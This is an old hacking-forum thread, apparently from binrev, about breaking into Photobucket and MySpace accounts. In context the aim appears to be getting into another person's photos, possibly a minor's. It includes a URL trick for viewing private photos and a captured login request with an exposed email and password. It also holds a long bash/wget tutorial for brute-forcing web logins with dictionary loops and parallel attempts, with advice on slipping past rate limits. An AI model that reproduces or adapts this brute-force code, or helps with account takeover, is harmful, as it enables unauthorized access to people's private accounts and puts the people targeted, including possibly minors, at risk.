87 replies to this topic

[ashley155]

its funny i didnt prove it wasnt my account at all. i lost the e-mail and password i used to sign up for photobucket. if it was as simple as clicking did you forget your password? and it being sent to me do you think id even be on this forum asking questions. no.

[tehbizz]

its funny i didnt prove it wasnt my account at all. i lost the e-mail and password i used to sign up for photobucket. if it was as simple as clicking did you forget your password? and it being sent to me do you think id even be on this forum asking questions. no.

Let's see this post: http://www.binrev.co...&...st&p=209549

first of all you can can in trouble for posting links. second of all that photobucket account u posted ive never even seen b4 so if your talking to me i think your talking to the wrong person. third of all who are you to tell me who i am?

Your post, verbatim, in response to this: http://www.binrev.co...&...st&p=209545

That one image being:
http://i51.photobuck...55/DSC06606.jpg

So my guess is you were searching myspace for under aged girls or you go to school with this girl and wanted access thus you stumbled across this site and posed as this girl. You do realize your a pervert right? Just go to google and type in "porn" and leave the under aged girls alone.

So, you admitted you've never seen that account which just happens to be named ASHLEY155. Boy, that's your username! Story collision? I think so. You're not the owner of the account according to your own admission.

[ashley155]

ashley155 is not the account im trying to get access. it is just coincidence that theres a photbucket account with that name. do you know how many people have photobucket? the accounts name im trying to access is ashleyseabra123

[Z3R0]

Ashley155 just admit it tehbiz just own your ass hard. You got pounded. Dammit you feel the effects of his pwnage.





http://www.all-netto...p;postcount=155

WOW ur good(not!!!).

Or \/ \/ \/ \/ \/

http://www.all-netto...p;postcount=218
----then the begging
http://www.all-netto...p;postcount=219

Really though you fool nobody.

Edited by Z3R0, 19 October 2006 - 02:47 PM.

[ashley155]

all that hassle for nothing. i found a way i dont know if i should share it but i will. you type in ?action=loopIt after the slash which comes right after the name of the persons account and download the program and you can see the first 50 pics in the persons account. better than nothing.

[invision620]

kik wtf just happened

[LogicError]

Hmm, I wonder why the FilmLoop prog only lets you see the first 50... you'd think it'd be customizable to allow for all of them or something.

[DoctorAwesome]

all that hassle for nothing. i found a way i dont know if i should share it but i will. you type in ?action=loopIt after the slash which comes right after the name of the persons account and download the program and you can see the first 50 pics in the persons account. better than nothing.

Does that actually work?
Download what program?

[intrigued058]

& where do you type ?action=loopIt at?

[DoctorAwesome]

& where do you type ?action=loopIt at?

Upon further investigation I've found out that this has been patched.

[MisterTwister]

It worked when he posted it at least.

[tetsuharu]

Wow, what a mess. Uhm.. Try not to respond to trolls next time. Sure they block your path to the bridge, but you can walk around em.


About the original question, which the original poster may never come back to read...

I've never learned to use brutus, but it seems complicated. Maybe someday it'll be worth learning. I can show you how to make a simple brute forcer in a shell script, though. Mighty powerful is wget.

First you find out the POST-DATA for the login form. You can read the html for the forms and patch it together, open a packet sniffer which will provide a very nice little line: ie, myspace:

POST /index.cfm?fuseaction=login.process&MyToken=50e6344b-f9e0-45f0-8564-c5d19839e2d1 HTTP/1.1
Host: login.myspace.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.myspace.com/
Cookie: RBLOCKCNT=0; TIMEZONE=2; DERDB=ZG9tYWluPXlhaG9vJnRsZD1jb20mc21va2VyPS0xJnNleHByZWY9MSZ1dHlwZT0yJnJlbGlnaW9uaWQ9MyZyZWdpb249JnBvc3RhbGNvZGU9NTUzNjMmbWFyaXRhbHN0YXR1cz1SJmluY29tZWlkPTAmaGVpZ2h0PTE4MCZnZW5kZXI9TSZmcmll
bmRzPTEmZXRobmljaWQ9LTEmYWdlPTE4JmJvZHl0eXBlaWQ9LTEmY2hpbGRyZW5pZD0xJmNvdW50cnk9VVMmZGF0aW5nPTAmZHJpbmtlcj0xJmVkdWNhdGlvbmlkPTYmcnNpX3dhbnQ9MA==; AUTOSONGPLAY=0; MSCOUNTRY=US; MSCulture=IP=134.84.95.243&IPCulture=en-US&PreferredCulture=en-US&Country=US; MYSPACE=myspace; NGUserID=a282558-5104-1163031108-1; __utmz=102220221.1163038267.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=102220221.1787020356.1163038267.1163038267.1163077363.2; __utmb=102220221; __utmc=102220221
Content-Type: application/x-www-form-urlencoded
Content-Length: 156

email=tetsu2051%40yahoo.com&password=godlovessexnmoney&ctl00%24Main%24SplashDisplay%24login%24loginbutton.x=24&ctl00%24Main%24SplashDisplay%24login%24loginbutton.y=9

here is the client side communication to the myspace server. the post-data, specifically, is the "email=tetsu2051%40yahoo.com&password=godlovessexnmoney&ctl00%24Main%24SplashDisplay%24login%24loginbutton.x=24&ctl00%24Main%24SplashDisplay%24login%24loginbutton.y=9"
you can use post-data and actually log into myspace or any other authenticated system with wget by using the option --post-data. in this case, it would be

wget --post-data="email=tetsu2051%40yahoo.com&password=godlovessexnmoney&ctl00%24Main%24SplashDisplay%24login%24loginbutton.x=24&ctl00%24Main%24SplashDisplay%24login%24loginbutton.y=9" "http://www.myspace.c...4-c5d19839e2d1"

you should notice the password field obvious in the post-data, ...&password=SOMEPASSWORD&...
There also seems to be a login session or 'token' here, so you might have to wget a login page first and grep for this MyToken variable. If this isnt the case, the following will work.

make a file with passwords to try, and put it in a file, like dictionary.txt
make a loop that will loop through the wget command, substituting your password for the attempting password.

for PASS in `cat dictionary.txt`; do
wget --post-data="email=tetsu2051%40yahoo.com&password=$PASS&ctl00%24Main%24SplashDisplay%24login%24loginbutton.x=24&ctl00%24Main%24SplashDisplay%24login%24loginbutton.y=9" "http://www.myspace.c...4-c5d19839e2d1"
done

This will attempt to log in with every password. You may want to output the file (-O somefile.html) and grep for html you will get only if logged in properly, and write an conditional statement in the for loop to test if login has been successful. I don't feel like doing this, so here's psuedo code

for PASS in `cat dictionary.txt`; do
wget --post-data="email=tetsu2051%40yahoo.com&password=$PASS&ctl00%24Main%24SplashDisplay%24login%24loginbutton.x=24&ctl00%24Main%24SplashDisplay%24login%24loginbutton.y=9" "http://www.myspace.c...4-c5d19839e2d1" -O attempt.html
grep "SOME HTML THAT IS ONLY IN LOGIN PAGE" attempt.html && echo $PASS && break;
done

the break will break out of the for loop and procede from done if attempt.html contains the code. In fact, you could pipe wget to grep, and make it a neat (albeit slightly irritating) one-liner

for PASS in `cat dictionary.txt`; do
wget --post-data="...&password=$PASS&..." "http://www.myspace.c...=login.process" -O - | grep "SOME HTML THAT IS ONLY IN LOGIN PAGE" attempt.html && echo $PASS && break;
done

If you want more info, you can use some conditional statements inside the for loop. this code will only print out anything if a login is successful. You can use numbered lines and some bash arithmetic if you want. for instance, linenum=`nl dictionary.txt | grep $PASS | awk '{print $1}'`; if [ $[$linenum%10] -eq 0 ]; then echo $PASS; fi; will print out every 10th password. If you wanted to go this route you may even want to numberline your dictionary file and awk the password out.


More importantly, in brute-forcing, time is most important, and every fraction of second you add between sends could be hours of testing. Also be aware of login limits, which most sites use nowadays. You may be able to attempt to brute force it, just very very very slowly, like over the course of a week. Patience is a virtue, of course, if you really want access. If timing is not a problem, you will want to multi-thread, like brutus does.

Multithreading can be accomplished with forks, the & symbol after a command. You do not want to start all of them at once. The site will immediately notice. It's almost akin to a DDoS, which no one likes, and is totally obvious.

A simple, off the top of my head idea would be to use a simple sleep in a while loop. I know it's not very awesome, but it works if I'm pressed for time.
(I'll use a read while loop here instead, its easier. )

test() {
wget --post-data="...&password=$1&..." "http://somesite.com/login.cfm" | grep "SOME HTML" && echo $1 >> worked.txt
}

while read a;
test $a &
read a; test $a &
read a; test $a &
read a; test $a &
sleep 5; # should test this experimentally, try 5 logins at once and use time or something to test it
done < dictionary.txt


This is as complicated as I've ever gotten, if anyone has better solutions please fill me in!
(none of this code has been tested.)

[Canti]

Ok. Ive always wondered how these brute force programs work. I was thinking that I might like to see if I can make one. Not to break into everyone's crap, just to see if I can make one.


Ive set up a test account on photobucket.com to see if I can do it.


Anyone want to help?


Oh and if this is against the rules, and just looks like another "help me hack hotmail" topic then delete it. It's not that big a deal to me. Its just something I wanted to try.




I asked a long time ago how brute force programs work when its online, but I cant find the topic. Yes, I searched.



Anyway, the account username is binrevmatt. (link)
The password is pretty simple. One word, no capital letters or numbers. I'm going to start with that.

Password is waste

Since I don't know who is posting their own information voluntarily, someone created an account for you all to test. Many people are coming here thinking they will get you to hax0r their girlfriends photobucket account and whatnot, the moderators will delete any other account that are mentioned in this thread!

The test account is "binrevtest".

http://s85.photobuck...k80/binrevtest/

Here is one image: http://i85.photobuck...est/11b7k86.jpg



It is a test account to see if photobucket security is reliable to evaluate whether or not its users should feel secure in using it. I do not authorize anyone doing any illegal activity with it, but I do not speak for photobucket and photobucket may not like you messing with their service. I feel like I should be able to test the service for security but this is just my opinion. If you violate their ToS, that is all on you. This account is simply to protect other potentially innocent accounts from being posted in our forums. It is not encouraging anyone to do anything to photobucket.

Remember, hacking is not about destruction! Don't be an asshat!

Pass is blahblah

[tina]

wow! just...wow!

[DanielG]

i'm guessing this will mean more PM's about PB password retreival and more PB emails for you Canti

[Canti]

i'm guessing this will mean more PM's about PB password retreival and more PB emails for you Canti

Probably

Note to every one. No I will not. Period.
I just posted as a proof of concept. The details of this will never be posted in public because of the potential danger it poses to young girls. IE password means access to email which means ease of locating the owner.

SO DO NOT ASK ME FOR DETAILS ON HOW TO DO THIS.

[StankDawg]

Also, there have been people in IRC and other places recently trying to SELL this trick to people. I don't know that it is anyone here (I hope not) but just be aware that you should never pay for stuff like this because 1) It might not work and 2) it will usually be fixed quickly and then you have nothing.

Selling information like this is totally against the hacker ethic! Do not support people who do this.

[tina]

i'm guessing this will mean more PM's about PB password retreival and more PB emails for you Canti

Probably

Note to every one. No I will not. Period.
I just posted as a proof of concept. The details of this will never be posted in public because of the potential danger it poses to young girls. IE password means access to email which means ease of locating the owner.

SO DO NOT ASK ME FOR DETAILS ON HOW TO DO THIS.

I'll try not to ask you on how to do this but (just curious) did you use this?

http://www.binrev.co...&...st&p=217249

[tehbizz]

i'm guessing this will mean more PM's about PB password retreival and more PB emails for you Canti

Probably

Note to every one. No I will not. Period.
I just posted as a proof of concept. The details of this will never be posted in public because of the potential danger it poses to young girls. IE password means access to email which means ease of locating the owner.

SO DO NOT ASK ME FOR DETAILS ON HOW TO DO THIS.

I'll try not to ask you on how to do this but (just curious) did you use this?

http://www.binrev.co...&...st&p=217249

JtR isn't a new tool and I doubt this was what was used to find this information.

[tetsuharu]

JtR isn't a new tool and I doubt this was what was used to find this information.

Not really that useful unless you can find the hashed password somehow. If you can, sweet.